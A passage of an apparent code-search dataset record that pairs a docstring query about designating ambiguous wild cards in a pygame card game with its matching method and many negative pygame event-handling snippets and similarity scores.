self.snake.parts[0] == self.oldapple:\n self.snake.grow = True\n self.oldapple = None\n\n self.screen.update()\n\n #TODO: accelerate every 5 points by 1 fps\n self.clock.tick()", "def show_board(self, game):\n\n self.screen.clear()\n self.show_banner()\n self.show_score(game)\n self.show_towers(game.board)\n self.screen.refresh()" ]
[ "0.60637283", "0.60512704", "0.6037003", "0.6004294", "0.5950593", "0.59421533", "0.59291905", "0.5891295", "0.5876253", "0.58727294", "0.584074", "0.5837629", "0.58247244", "0.58215046", "0.5802971", "0.5793627", "0.57535934", "0.57366675", "0.5722204", "0.5721105", "0.5720504", "0.5713582", "0.57123154", "0.57120526", "0.5709929", "0.5704003", "0.56968915", "0.56812036", "0.568043", "0.5676974", "0.5676159", "0.56754553", "0.5675301", "0.5672773", "0.566529", "0.5636117", "0.56312853", "0.5630546", "0.5628465", "0.56269413", "0.56235605", "0.5616468", "0.56002074", "0.55983394", "0.5559656", "0.55584383", "0.55563223", "0.5547421", "0.55426186", "0.55323297", "0.55288476", "0.5528343", "0.5485539", "0.5477978", "0.5476608", "0.54718417", "0.5470689", "0.5469738", "0.54689604", "0.5467437", "0.5465498", "0.54641026", "0.54633707", "0.5456213", "0.5451998", "0.54498804", "0.5429624", "0.54281837", "0.542734", "0.5419599", "0.5419483", "0.54187477", "0.5417958", "0.5407276", "0.5398314", "0.5392637", "0.53904366", "0.538987", "0.538987", "0.5387316", "0.538008", "0.5379806", "0.53773916", "0.5371596", "0.5358439", "0.5356497", "0.53526795", "0.53526795", "0.5352428", "0.53505003", "0.53477186", "0.53469837", "0.53432024", "0.5333044", "0.5330059", "0.53227633", "0.5319683", "0.5319155", "0.5315449", "0.5314008" ]
0.5553602
47
This runs instead of most of nextEvent when Shared_Board is True and there are ambiguous wild cards. It is looking for key strokes to designate ambiguous wild cards in runs. The mouse is ignored until you designate all the wilds (turn phase goes back to play).
def nextEventWildsOnBoard(self): if self.controller._state.rules.Shared_Board and self.num_wilds > 0: for self.event in pygame.event.get(): if self.event.type == pygame.QUIT: # The window crashed, we should handle this print("pygame crash, AAAHHH") pygame.quit() quit() else: # in Shared_Board games, check if there are wilds that need to be updated. # All other events are ignored until play is finished. HandManagement.wildsHiLoGetInput(self)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def nextEvent(self):\n\n if self.controller._state.rules.Shared_Board:\n self.num_wilds = len(self.controller.unassigned_wilds_dict.keys())\n if self.num_wilds > 0:\n self.nextEventWildsOnBoard()\n\n for self.event in pygame.event.get():\n if self.event.type == pygame.QUIT:\n # The window crashed, we should handle this\n print(\"pygame crash, AAAHHH\")\n pygame.quit()\n quit()\n\n if not self.controller._state.rules.Shared_Board and self.num_wilds > 0:\n wild_instructions = 'Use the keyboard to designate your prepared wild cards \\r\\n '\n wild_instructions = wild_instructions + '(use 0 for 10 and J, Q, or K for facecards).'\n self.controller.note = wild_instructions\n pos = pygame.mouse.get_pos()\n\n if self.event.type == pygame.MOUSEBUTTONDOWN:\n self.RuleSetsButtons.ClickedButton(self, pos)\n for element in self.hand_info:\n # cannot select prepared cards, so not included in logic below.\n if element.img_clickable.isOver(pos):\n if element.status == 1:\n element.status = 0\n element.img_clickable.changeOutline(0)\n elif element.status == 0:\n element.status = 1\n element.img_clickable.changeOutline(2)\n\n elif self.event.type == pygame.MOUSEMOTION:\n self.RuleSetsButtons.MouseHiLight(self, pos)\n HandManagement.MouseHiLight(self.hand_info, pos)\n elif self.event.type == pygame.KEYDOWN:\n if self.controller._state.rules.Buy_Option:\n if self.controller.buying_opportunity:\n if self.event.key == pygame.K_y:\n self.controller.wantTopCard(True)\n self.controller.note = 'You have signaled you want to buy the card.'\n elif self.event.key == pygame.K_n:\n self.controller.wantTopCard(False)\n self.controller.note = 'You have signaled you do not want to buy the card.'\n if not self.controller._state.rules.Shared_Board and self.num_wilds > 0:\n HandManagement.ManuallyAssign(self)", "def main(self):\n while 1:\n events = get_gamepad()\n for event in events:\n\n if(event.ev_type == \"Absolute\" ):\n\n if event.code in self.map[GAMEPAD].keys():\n self.absolute_switch[ self.map[GAMEPAD][event.code] ](event.state)\n\n\n if(event.ev_type == \"Key\" ):\n\n if event.code in self.map[GAMEPAD].keys():\n self.btn_switch[ self.map[GAMEPAD][event.code] ](self.map[GAMEPAD][event.code], event.state)\n \n\n\n\n #print(event.ev_type, event.code, event.state)", "def control(self):\n while not (self.game_over() or self.quit):\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n self.quit = True\n elif event.type == pygame.KEYDOWN:\n if event.key == pygame.K_r:\n self.play()\n elif event.key == pygame.K_m:\n self.__init__()\n elif event.key == pygame.K_LEFT and len(self.sequence)>=2:\n self.sequence.pop()\n self.board = self.sequence.pop()\n self.draw()\n elif event.key == pygame.K_1:\n self.tip(1)\n elif event.key == pygame.K_2:\n self.tip(2)\n elif event.key == pygame.K_3:\n self.tip(3)\n elif event.key == pygame.K_4:\n self.tip(4)\n elif event.key == pygame.K_5:\n self.tip(5)\n \n elif event.type == pygame.MOUSEBUTTONDOWN and event.button == 1:\n ## if mouse is pressed get position of cursor ##\n pos = pygame.mouse.get_pos()\n ## check if cursor is on button ##\n for i in range(len(self.buttons)):\n for j in range(len(self.buttons[i])):\n if self.buttons[i][j].collidepoint(pos):\n if self.selected == None:\n self.selected = [i,j]\n elif self.selected == [i,j]:\n self.selected = None\n elif self.board[self.selected[0]][self.selected[1]]==0:\n self.selected = [i,j]\n else:\n if self.move(i,j):\n self.selected = None\n self.draw()\n return True\n else:\n self.selected = None\n self.draw()\n return False\n self.draw()\n return False", "def playEvents(self, event):\n mouse = pygame.mouse.get_pressed()\n mpos = pygame.mouse.get_pos()\n # If we use the left click\n if mouse[0]:\n # We convert the position of the mouse according to the grid position and the margin\n x, y = mpos[0] % (self.ts + self.ms), mpos[1] % (self.ts + self.ms)\n if x > self.ms and y > self.ms:\n tile = mpos[0] // self.ts, mpos[1] // self.ts\n if self.in_grid(tile) and tile in self.adjacent():\n self.switch(tile)\n\n if event.type == pygame.KEYDOWN:\n for key, dx, dy in ((pygame.K_s, 0, -1), (pygame.K_z, 0, 1), (pygame.K_d, -1, 0), (pygame.K_q, 1, 0)):\n if event.key == key:\n x, y = self.opentile\n tile = x + dx, y + dy\n if self.in_grid(tile):\n self.switch(tile)\n # Move randomly a tile.\n if event.key == pygame.K_SPACE:\n self.random()\n if event.key == pygame.K_a:\n action = self.agent.play(self.format_tiles())\n reward = self.step(action)[1]\n print(f\"Reward: {reward}\")", "def check_events_battle_screen(ai_settings, screen, buttons,screen_status, button_status, card_database_filter, user, action, player2):\n for event in pygame.event.get():\n\n if event.type == pygame.QUIT:\n sys.exit()\n elif event.type == pygame.KEYDOWN:\n if event.key == pygame.K_ESCAPE:\n sys.exit()\n\n\n elif event.type == pygame.MOUSEBUTTONDOWN:\n #check click on cards in hand\n for i in range(1,8):\n if Rect((100+145*(i-1)),610,130,180).collidepoint(pygame.mouse.get_pos()):\n battle_screen_hand_click_action('hand',ai_settings,screen,buttons, screen_status, button_status, card_database_filter, user,player2, position = str(i))\n break\n\n for i in range(1,4):\n if Rect(420,(220 + 110*(i-1)),130,80).collidepoint(pygame.mouse.get_pos()):\n battle_screen_battleground_click_action('player2-monster',ai_settings,screen,buttons, screen_status, button_status, card_database_filter, user, player2, position = str(i))\n break\n\n for i in range(4,7):\n if Rect(245, (220 + 110*(i-4)),130,80).collidepoint(pygame.mouse.get_pos()):\n battle_screen_battleground_click_action('player2-monster',ai_settings,screen,buttons, screen_status, button_status, card_database_filter, user, player2, position = str(i))\n break\n\n\n\n if Rect(20,40,130,180).collidepoint(pygame.mouse.get_pos()):\n battle_screen_battleground_click_action('player2-character',ai_settings,screen,buttons, screen_status, button_status, card_database_filter, user, player2)\n\n # win/lost back to main menu button\n if Rect(500, 500, 200, 40).collidepoint(pygame.mouse.get_pos()):\n if screen_status.battle_screen_action_indicator == 'game-end':\n screen_status.battle_screen_display = False\n screen_status.welcome_screen_display = True\n\n if Rect(200, 0, 50, 30).collidepoint(pygame.mouse.get_pos()):\n button_status.rules_display = True\n\n\n # When menu window is on\n if button_status.battle_screen_menu_display == True:\n\n # Turn sound on\n if Rect(447+280, 323-270, 28, 28).collidepoint(pygame.mouse.get_pos()):\n ai_settings.sound_indicator = True\n # Turn sound off\n elif Rect(482+280, 323-270, 28, 28).collidepoint(pygame.mouse.get_pos()):\n ai_settings.sound_indicator = False\n # Turn music on\n elif Rect(447+280, 372-270, 28, 28).collidepoint(pygame.mouse.get_pos()):\n ai_settings.music_indicator = True\n # Turn music off\n elif Rect(482+280, 372-270, 28, 28).collidepoint(pygame.mouse.get_pos()):\n ai_settings.music_indicator = False\n\n # Change Theme\n elif Rect(447+280, 419-270, 98, 35).collidepoint(pygame.mouse.get_pos()):\n ai_settings.theme_indicator = 'Lith Harbor'\n change_bg_music('Lith Harbor')\n\n elif Rect(559+280, 419-270, 98, 35).collidepoint(pygame.mouse.get_pos()):\n ai_settings.theme_indicator = 'Leafre'\n change_bg_music('Leafre')\n\n elif Rect(447+280, 468-270, 98, 35).collidepoint(pygame.mouse.get_pos()):\n ai_settings.theme_indicator = 'Pantheon'\n change_bg_music('Pantheon')\n\n elif Rect(559+280, 468-270, 98, 35).collidepoint(pygame.mouse.get_pos()):\n ai_settings.theme_indicator = 'Ellinia'\n change_bg_music('Ellinia')\n\n # change AI speeding\n elif Rect(475+280, 524-270, 56, 35).collidepoint(pygame.mouse.get_pos()):\n ai_settings.AI_speed_indicator = '1000'\n\n elif Rect(545+280, 524-270, 56, 35).collidepoint(pygame.mouse.get_pos()):\n ai_settings.AI_speed_indicator = '2000'\n\n elif Rect(615+280, 524-270, 56, 35).collidepoint(pygame.mouse.get_pos()):\n ai_settings.AI_speed_indicator = '3000'\n\n # Quit settings window\n elif Rect(699+280, 300-270, 21, 21).collidepoint(pygame.mouse.get_pos()):\n button_status.battle_screen_menu_display = False\n\n # Concede and back to main menu\n elif Rect(700, 310, 180, 40).collidepoint(pygame.mouse.get_pos()):\n screen_status.battle_screen_action_indicator = 'game-end'\n button_status.battle_screen_win_lost_indicator = 'lost'\n\n if button_status.rules_display == True:\n # When we click on '>'\n if Rect(640, 37, 20, 20).collidepoint(pygame.mouse.get_pos()):\n if int(button_status.rules_page_id) < 4:\n button_status.rules_page_id = str(int(button_status.rules_page_id)+1)\n else:\n pass\n # When we click on '<'\n elif Rect(540, 37, 20, 20).collidepoint(pygame.mouse.get_pos()):\n if int(button_status.rules_page_id) > 1:\n button_status.rules_page_id = str(int(button_status.rules_page_id)-1)\n else:\n pass\n\n elif Rect(975, 35, 25, 25).collidepoint(pygame.mouse.get_pos()):\n button_status.rules_display = False\n\n\n\n\n if rect_union(buttons).collidepoint(pygame.mouse.get_pos()):\n for button in buttons:\n if button.rect.collidepoint(pygame.mouse.get_pos()):\n if button.text == 'Menu':\n button_status.battle_screen_menu_display = True\n\n elif button.text == '>':\n screen_status.battle_screen_my_hand_page_id += 1\n button_status.battle_screen_my_hand_indicator_display = False # Turn off display of buttons when change page\n\n if (screen_status.battle_screen_action_indicator == 'stage-1-level-up'\n or screen_status.battle_screen_action_indicator == 'stage-2-other-action-detail-spawn-and-think-fast'\n or screen_status.battle_screen_action_indicator == 'stage-2-other-action-detail-spawn-and-equip'\n or screen_status.battle_screen_action_indicator == 'stage-2-other-action-detail-think-fast-and-equip'\n or screen_status.battle_screen_action_indicator == 'stage-2-other-action-detail-spawn'\n or screen_status.battle_screen_action_indicator == 'stage-2-other-action-detail-think-fast'\n or screen_status.battle_screen_action_indicator == 'stage-2-other-action-detail-equip'\n ):\n button_status.battle_screen_instruction_bar_yes_display = False\n button_status.battle_screen_instruction_bar_yes_backend = False\n\n elif button.text == '<':\n screen_status.battle_screen_my_hand_page_id -= 1\n button_status.battle_screen_my_hand_indicator_display = False\n\n if (screen_status.battle_screen_action_indicator == 'stage-1-level-up'\n or screen_status.battle_screen_action_indicator == 'stage-2-other-action-detail-spawn-and-think-fast'\n or screen_status.battle_screen_action_indicator == 'stage-2-other-action-detail-spawn-and-equip'\n or screen_status.battle_screen_action_indicator == 'stage-2-other-action-detail-think-fast-and-equip'\n or screen_status.battle_screen_action_indicator == 'stage-2-other-action-detail-spawn'\n or screen_status.battle_screen_action_indicator == 'stage-2-other-action-detail-think-fast'\n or screen_status.battle_screen_action_indicator == 'stage-2-other-action-detail-equip'\n ):\n button_status.battle_screen_instruction_bar_yes_display = False\n button_status.battle_screen_instruction_bar_yes_backend = False\n\n elif button.text == 'level up':\n battle_screen_hand_click_action('level up',ai_settings,screen,buttons, screen_status, button_status, card_database_filter, user, player2)\n elif button.text == 'Yes':\n battle_screen_instruction_bar_yes_skip_action('yes',ai_settings,screen,buttons, screen_status, button_status, card_database_filter, user,action,player2)\n elif button.text == 'Skip':\n battle_screen_instruction_bar_yes_skip_action('skip',ai_settings,screen,buttons, screen_status, button_status, card_database_filter, user, action, player2)\n\n\n elif event.type == pygame.MOUSEMOTION: # Mostly for zoom in\n x = 0 # indicator helps remove zoom in.\n for i in range(1,8):\n if Rect((100+145*(i-1)),610,130,180).collidepoint(pygame.mouse.get_pos()):\n button_status.card_zoom_active = True\n button_status.card_zoom_screen_indicator = 'battle_screen'\n button_status.card_zoom_part_indicator = 'hand'\n button_status.card_zoom_position_indicator = str(i)\n x = 1\n\n for i in range(1,16):\n if Rect(1050,(220 + 23 * (i-1)),130,23).collidepoint(pygame.mouse.get_pos()):\n button_status.card_zoom_active = True\n button_status.card_zoom_screen_indicator = 'battle_screen'\n button_status.card_zoom_part_indicator = 'character 1 under'\n button_status.card_zoom_position_indicator = str(i)\n x = 1\n\n for i in range(1,16):\n if Rect(20,(220 + 23 * (i-1)),130,23).collidepoint(pygame.mouse.get_pos()):\n button_status.card_zoom_active = True\n button_status.card_zoom_screen_indicator = 'battle_screen'\n button_status.card_zoom_part_indicator = 'character 2 under'\n button_status.card_zoom_position_indicator = str(i)\n x = 1\n\n\n if Rect(1050,40,130,180).collidepoint(pygame.mouse.get_pos()):\n button_status.card_zoom_active = True\n button_status.card_zoom_screen_indicator = 'battle_screen'\n button_status.card_zoom_part_indicator = 'character 1'\n x = 1\n\n if Rect(20,40,130,180).collidepoint(pygame.mouse.get_pos()):\n button_status.card_zoom_active = True\n button_status.card_zoom_screen_indicator = 'battle_screen'\n button_status.card_zoom_part_indicator = 'character 2'\n x = 1\n\n if Rect(880, 5, 50, 20).collidepoint(pygame.mouse.get_pos()):\n button_status.battle_screen_history_bar_detail_display = True\n x = 1\n\n if x == 0:\n button_status.card_zoom_active = False\n button_status.battle_screen_history_bar_detail_display = False\n\n\n\n elif event.type == pygame.MOUSEBUTTONUP:\n pass", "def run_game(self, board):\n run_program = True\n\n while run_program:\n # eventlistener for mouse events\n for event in pygame.event.get():\n if pygame.mouse.get_pressed() and event.type == pygame.MOUSEBUTTONDOWN:\n if event.type == pygame.MOUSEBUTTONDOWN:\n # Get position of mouse.\n (x, y) = pygame.mouse.get_pos()\n\n # Set circle position in the middle of the grid_square.\n draw_x = x - (x % self.square_size) + self.square_mid\n\n # Calculation to get xPosition from selected Mouse xPosition.\n x = x // 80\n\n # Check if column is full before placing. Break out if that's the case.\n if self.check_if_column_full(board, x):\n break\n\n # Calculate the yPosition, where the chip should be placed with various helper methods.\n draw_y = self.height - (self.square_size * self.draw_dict_mapping[self.get_y_pos(board, x)]) + 40\n\n # Check, which players turn it is.\n if self.playerOne:\n # Player Ones turn.\n pos = (x, self.get_y_pos(board, x))\n if board[pos] == 0:\n board[pos] = 1\n self.draw_circle(draw_x, draw_y, self.playerOne)\n self.screen.blit(self.background, (0, 0))\n if self.check_if_user_won(board, pos, 1):\n run_program = False\n self.switch_player()\n else:\n # Player Twos turn.\n pos = (x, self.get_y_pos(board, x))\n if board[pos] == 0:\n board[pos] = 2\n self.draw_circle(draw_x, draw_y, self.playerOne)\n self.screen.blit(self.background, (0, 0))\n if self.check_if_user_won(board, pos, 2):\n run_program = False\n self.switch_player()\n\n if event.type == pygame.KEYDOWN:\n # End the game with escape.\n if event.key == pygame.K_ESCAPE:\n self.draw = True\n run_program = False\n\n # End the Program with the X in the upper right corner.\n elif event.type == pygame.QUIT:\n self.draw = True\n run_program = False\n\n pygame.display.flip()\n self.game_over(self.playerOne, self.draw)\n # wait for given time and end the game\n pygame.time.wait(5000)\n pygame.quit()", "def event2513():\n header(2513)\n\n if_player_does_not_have_special_effect(7, SPEFFECT.RunicHit0)\n if_player_does_not_have_special_effect(7, SPEFFECT.RunicHit1)\n if_player_does_not_have_special_effect(7, SPEFFECT.RunicHit2)\n if_player_does_not_have_special_effect(7, SPEFFECT.RunicHit3)\n if_player_does_not_have_special_effect(7, SPEFFECT.RunicHit4)\n if_player_does_not_have_special_effect(7, SPEFFECT.RunicHit5)\n if_condition_true(0, 7)\n\n if_event_flag_on(1, EVENT.ScintillaRuneActive)\n\n if_player_has_special_effect(-1, SPEFFECT.RunicHit0)\n if_player_has_special_effect(-1, SPEFFECT.RunicHit1)\n if_player_has_special_effect(-1, SPEFFECT.RunicHit2)\n if_player_has_special_effect(-1, SPEFFECT.RunicHit3)\n if_player_has_special_effect(-1, SPEFFECT.RunicHit4)\n if_player_has_special_effect(-1, SPEFFECT.RunicHit5)\n if_condition_true(1, -1)\n\n if_condition_true(0, 1)\n\n # Roll d30.\n flag.disable_chunk(970, 999)\n flag.enable_random_in_chunk(970, 999)\n\n # Count appropriate flag range as success and spawn Scintilla projectile.\n if_player_has_special_effect(2, SPEFFECT.RunicHit0)\n skip_if_condition_false(4, 2)\n if_at_least_one_true_flag_in_range(-2, 970, 971) # 2/30 chance at Scintilla level 0.\n restart_if_condition_false(-2)\n spawner.shoot_projectile(CHR.Player, projectile_entity_id=CHR.Player, damipoly_id=7, behavior_id=2001)\n restart()\n\n if_player_has_special_effect(3, SPEFFECT.RunicHit1)\n skip_if_condition_false(4, 3)\n if_at_least_one_true_flag_in_range(-2, 970, 972) # 3/30 chance at Scintilla level 1.\n restart_if_condition_false(-2)\n spawner.shoot_projectile(CHR.Player, projectile_entity_id=CHR.Player, damipoly_id=7, behavior_id=2001)\n restart()\n\n if_player_has_special_effect(4, SPEFFECT.RunicHit2)\n skip_if_condition_false(4, 4)\n if_at_least_one_true_flag_in_range(-2, 970, 973) # 4/30 chance at Scintilla level 2.\n restart_if_condition_false(-2)\n spawner.shoot_projectile(CHR.Player, projectile_entity_id=CHR.Player, damipoly_id=7, behavior_id=2001)\n restart()\n\n if_player_has_special_effect(5, SPEFFECT.RunicHit3)\n skip_if_condition_false(4, 5)\n if_at_least_one_true_flag_in_range(-2, 970, 974) # 5/30 chance at Scintilla level 3.\n restart_if_condition_false(-2)\n spawner.shoot_projectile(CHR.Player, projectile_entity_id=CHR.Player, damipoly_id=7, behavior_id=2001)\n restart()\n\n if_player_has_special_effect(6, SPEFFECT.RunicHit4)\n skip_if_condition_false(4, 6)\n if_at_least_one_true_flag_in_range(-2, 970, 975) # 6/30 chance at Scintilla level 4.\n restart_if_condition_false(-2)\n spawner.shoot_projectile(CHR.Player, projectile_entity_id=CHR.Player, damipoly_id=7, behavior_id=2001)\n restart()\n\n if_player_has_special_effect(-3, SPEFFECT.RunicHit5)\n restart_if_condition_false(-3) # This shouldn't happen.\n if_at_least_one_true_flag_in_range(-2, 970, 972) # 3/30 chance of Crystal Scintilla at level 5.\n skip_if_condition_false(2, -2)\n spawner.shoot_projectile(CHR.Player, projectile_entity_id=CHR.Player, damipoly_id=7, behavior_id=2002)\n skip(2)\n if_at_least_one_true_flag_in_range(-4, 973, 976) # 4/30 chance of normal Scintilla at level 5.\n skip_if_condition_false(1, -4)\n spawner.shoot_projectile(CHR.Player, projectile_entity_id=CHR.Player, damipoly_id=7, behavior_id=2001)\n restart()", "def events(self):\n # catch all events here\n for event in pg.event.get():\n if event.type == pg.QUIT:\n self.quit_game()\n if event.type == pg.KEYDOWN:\n if event.key == pg.K_ESCAPE:\n menu.paused = True\n menu.pause_menu() #code gets stuck in this call until a button is pressed in the pause menu\n self.clock=pg.time.Clock()\n if event.key == pg.K_h:\n self.draw_debug = not self.draw_debug\n if event.key == pg.K_o:\n if self.flashlight.on:#turning off flashlight\n self.darkness.on = True\n self.battery.duration-=pg.time.get_ticks()-self.battery.last_update\n self.flashlight.on=False\n else: #turning on flashlight\n self.darkness.on = False\n self.battery.last_update=pg.time.get_ticks()\n self.flashlight.on=True\n\n #darkness condition\n if self.transition:\n self.darkness_transition(self.player)\n self.kidnap(self.player)\n\n # win condition\n if pg.sprite.spritecollide(self.player, self.win, False, collide_hit_rect):\n menu.win_menu()\n\n #got hit condition\n hit=pg.sprite.spritecollide(self.player, self.threat, False, collide_hit2_rect)\n if hit:\n self.hit(self.player, hit[0])\n \n #mirror\n self.portal(self.player)\n self.portal(self.monster)", "def main_board_maintenance(self,x_cor,y_cor):\r\n\t\r\n\t\tfor event in pygame.event.get(): \r\n\r\n\t\t\tif event.type == pygame.QUIT:\r\n\t\t\t\tpygame.display.quit()\r\n\t\t\t\tpygame.quit()\r\n\t\t\t\tquit()\r\n\t\t\t\r\n\t\t\tif event.type == pygame.MOUSEBUTTONDOWN:\r\n\r\n\t\t\t\tx_adjusted,y_adjusted = Helping_Class.convert_coordinate(x_cor,y_cor,from_where ='board')\r\n\t\t\t\t#print(x_adjusted/80,y_adjusted/80)\r\n\r\n\t\t\t\tif self.selected_from_selection_bar :\r\n\t\t\t\t\t#print('inside selection bar selection option')\r\n\t\t\t\t\tx_adjusted,y_adjusted = Helping_Class.convert_coordinate(x_cor,y_cor,from_where ='board')\r\n\t\t\t\t\ttemp_game_state = CP.game_data()\r\n\t\t\t\t\ttemp_game_state = copy.deepcopy(self.game_state)\r\n\t\t\t\t\tdata_convert = CP.Conversion_of_postion_name(self.selected_piece,Helping_Class.selection_bar_reverse_mapping[self.selected_piece] ,(x_adjusted,y_adjusted))\r\n\t\t\t\t\ttemp_game_state.update(data_convert.piece, int(data_convert.i_pos_ani()), int(data_convert.f_pos_ani()))\r\n\t\t\t\t\ttemp_game_state.active_color = not temp_game_state.active_color\r\n\t\t\t\t\tfen = temp_game_state.generate_fen()\r\n\t\t\t\t\tboard2 = chess.Board(fen=fen)\r\n\t\t\t\t\tprint(board2)\r\n\t\t\t\t\tprint(fen)\r\n\t\t\t\t\tprint('board2.is_check()',board2.is_check())\r\n\t\t\t\t\t\r\n\t\t\t\t\t#now we need to place the piece on board\r\n\t\t\t\t\tif self.game_state.board[Helping_Class.convert_my_coordinate_to_anirudh(x_adjusted,y_adjusted)] == None:\r\n\t\t\t\t\t\t#print(self.selected_position)\r\n\t\t\t\t\t\tif not board2.is_check():\r\n\t\t\t\t\t\t\tif self._check_valid_position_(x_adjusted,y_adjusted):\r\n\t\t\t\t\t\t\t\tself.place_piece_on_board_from_selection_bar(x_adjusted,y_adjusted)\r\n\t\t\t\t\t\t\t\t#rajan's\r\n\t\t\t\t\t\t\t\t#print(self.selected_piece)\r\n\t\t\t\t\t\t\t\t#print(self.selected_position)\r\n\t\t\t\t\t\t\t\tdata_convert = CP.Conversion_of_postion_name(self.selected_piece,self.selected_position ,(x_adjusted,y_adjusted))\r\n\t\t\t\t\t\t\t\tself.game_state.update(data_convert.piece, int(data_convert.i_pos_ani()), int(data_convert.f_pos_ani()))\r\n\t\t\t\t\t\t\t\tself.selected_piece = None\r\n\t\t\t\t\t\t\t\tself.selected_position = None\r\n\r\n\t\t\t\t\t\t\t\tself.computer_turn =True\r\n\t\t\t\t\t\telse:\r\n\t\t\t\t\t\t\tpass\r\n\t\t\t\t\t#board position is filled then nothing to do\r\n\t\t\t\t\telse:\r\n\t\t\t\t\t\t#if his piece change selection\r\n\t\t\t\t\t\tself.selected_from_selection_bar =False\r\n\t\t\t\t\t\tself.selected_from_board = True\r\n\t\t\t\t\t\tself.selected_piece = self.anirudh_2_pritish[self.game_state.board[Helping_Class.convert_my_coordinate_to_anirudh(x_adjusted,y_adjusted)]]\r\n\t\t\t\t\t\tself.selected_position = (x_adjusted,y_adjusted)\r\n\r\n\r\n\t\t\t\telif self.selected_from_board:\r\n\t\t\t\t\t#print('inside selection bar board option')\r\n\t\t\t\t\tx_adjusted,y_adjusted = Helping_Class.convert_coordinate(x_cor,y_cor,from_where ='board')\r\n\t\t\t\t\t\r\n\t\t\t\t\tomega = True\r\n\t\t\t\t\tif self.selected_position:\r\n\t\t\t\t\t\tif self.selected_position == (x_adjusted,y_adjusted):\r\n\t\t\t\t\t\t\tomega = False\r\n\t\t\t\t\t#print(self.selected_position,(x_adjusted,y_adjusted))\r\n\t\t\t\t\tif omega:\r\n\t\t\t\t\t\tmove = self._check_valid_move_(x_adjusted,y_adjusted)\r\n\t\t\t\t\t\tprint(move)\r\n\t\t\t\t\tif omega:\r\n\t\t\t\t\t\tif move:\r\n\t\t\t\t\t\t\tself.computer_turn = True\r\n\t\t\t\t\t\t\t#if move contains x then we have update state of captured piece\r\n\t\t\t\t\t\t\t#else just update selected piece\r\n\t\t\t\t\t\t\t#print(\"correct move\")\r\n\t\t\t\t\t\t\tself.capture_piece_update_board_or_place_piece(move,x_adjusted,y_adjusted)\r\n\r\n\t\t\t\t\t\telse:\r\n\t\t\t\t\t\t\t#select the piece\r\n\t\t\t\t\t\t\tif self.game_state.board[Helping_Class.convert_my_coordinate_to_anirudh(x_adjusted,y_adjusted)]:\r\n\t\t\t\t\t\t\t\tself.selected_piece = self.anirudh_2_pritish[self.game_state.board[Helping_Class.convert_my_coordinate_to_anirudh(x_adjusted,y_adjusted)]]\r\n\t\t\t\t\t\t\t\tself.selected_position = (x_adjusted,y_adjusted)\r\n\t\t\t\t\t\t\t\tself.selected_from_board = True\r\n\t\t\t\t\t\r\n\t\t\t\telse:\r\n\t\t\t\t\t\r\n\t\t\t\t\tx_adjusted,y_adjusted = Helping_Class.convert_coordinate(x_cor,y_cor,from_where ='board')\r\n\t\t\t\t\tif self.game_state.board[Helping_Class.convert_my_coordinate_to_anirudh(x_adjusted,y_adjusted)]:\r\n\t\t\t\t\t\t#select the piece\r\n\t\t\t\t\t\tif self.whose_move == 'white':\r\n\t\t\t\t\t\t\tif 'W' in self.anirudh_2_pritish[self.game_state.board[Helping_Class.convert_my_coordinate_to_anirudh(x_adjusted,y_adjusted)]]:\r\n\t\t\t\t\t\t\t\tself.selected_piece = self.anirudh_2_pritish[self.game_state.board[Helping_Class.convert_my_coordinate_to_anirudh(x_adjusted,y_adjusted)]]\r\n\t\t\t\t\t\t\t\tself.selected_from_board = True\r\n\t\t\t\t\t\t\t\tself.selected_position = (x_adjusted,y_adjusted)\r\n\t\t\t\t\t\t\telse:\r\n\t\t\t\t\t\t\t\t#nothing to do\r\n\t\t\t\t\t\t\t\tpass\r\n\t\t\t\t\t\telif self.whose_move == 'black':\r\n\t\t\t\t\t\t\tif 'B' in self.anirudh_2_pritish[self.game_state.board[Helping_Class.convert_my_coordinate_to_anirudh(x_adjusted,y_adjusted)]]:\r\n\t\t\t\t\t\t\t\tself.selected_piece = self.anirudh_2_pritish[self.game_state.board[Helping_Class.convert_my_coordinate_to_anirudh(x_adjusted,y_adjusted)]]\r\n\t\t\t\t\t\t\t\tself.selected_from_board = True\r\n\t\t\t\t\t\t\t\tself.selected_position = (x_adjusted,y_adjusted)\r\n\t\t\t\t\t\t\telse:\r\n\t\t\t\t\t\t\t\t#nothing to do\r\n\t\t\t\t\t\t\t\tpass\r\n\t\t\t\t\telse:\r\n\t\t\t\t\t\t#it is none means nothing is their so nothing to do\r\n\t\t\t\t\t\tpass\r\n\t\t\t\t\t\r\n\t\t\t\r\n\r\n\t\t\telse:\r\n\t\t\t\t#print(\"not_pressed\")\r\n\t\t\t\tpass", "def _check_keydown_play_events(self, event):\n\t\tif (event.key in (pygame.K_SPACE, pygame.K_UP)) and (\n\t\t\tself.bolan.rect.y >= self.bolan.default_y):\n\t\t\tself.bolan.is_jump = True\n\t\tif event.key == pygame.K_DOWN:\n\t\t\tself.bolan.is_duck = True", "def main():\n p.init() # Initializing pygame object\n screen = p.display.set_mode((WIDTH, HEIGHT))\n clock = p.time.Clock()\n screen.fill(p.Color(\"white\"))\n gs = ChessEngine.GameState()\n\n valid_moves = gs.get_valid_moves()\n\n # Flag to control the number of times get valid moves is called\n # Only if the user makes a valid move, it is called\n move_made = False\n\n load_images()\n game_running = True\n\n sq_selected = tuple() # (row, col), keeps track of user click\n player_clicks = list() # 2 tuples in the list, [(row, col), (row, col)]\n\n while game_running:\n\n for e in p.event.get():\n if e.type == p.QUIT:\n game_running = False\n\n elif e.type == p.KEYDOWN:\n if e.key == p.K_z: # undo when 'z' is pressed\n gs.undo_move()\n move_made = True # On undo we need to generate all valid moves again\n\n elif e.type == p.MOUSEBUTTONDOWN:\n location = p.mouse.get_pos() # Gets (col, row) location of mouse click\n row = location[1] // SQ_SIZE\n col = location[0] // SQ_SIZE\n\n # If user clicks on the same square again, i.e. as source and destination,\n # then we deselect it and reset player clicks\n if sq_selected == (row, col):\n sq_selected = tuple()\n player_clicks = list()\n else:\n if not (len(player_clicks) == 0 and gs.board[row][col] == gs.EMPTY_SQ):\n sq_selected = (row, col)\n player_clicks.append(sq_selected) # Append both first and second clicks\n\n # After second click only\n if len(player_clicks) == 2:\n move = ChessEngine.Move(start_sq=player_clicks[0], end_sq=player_clicks[1], board=gs.board)\n # move.print_move()\n for i in range(len(valid_moves)):\n\n if move == valid_moves[i]:\n gs.make_move(valid_moves[i])\n move_made = True\n\n player_clicks = list() # Resetting to restart the 2 click move logic\n sq_selected = tuple()\n if not move_made:\n player_clicks = [sq_selected]\n\n if move_made:\n valid_moves = gs.get_valid_moves()\n move_made = False\n\n 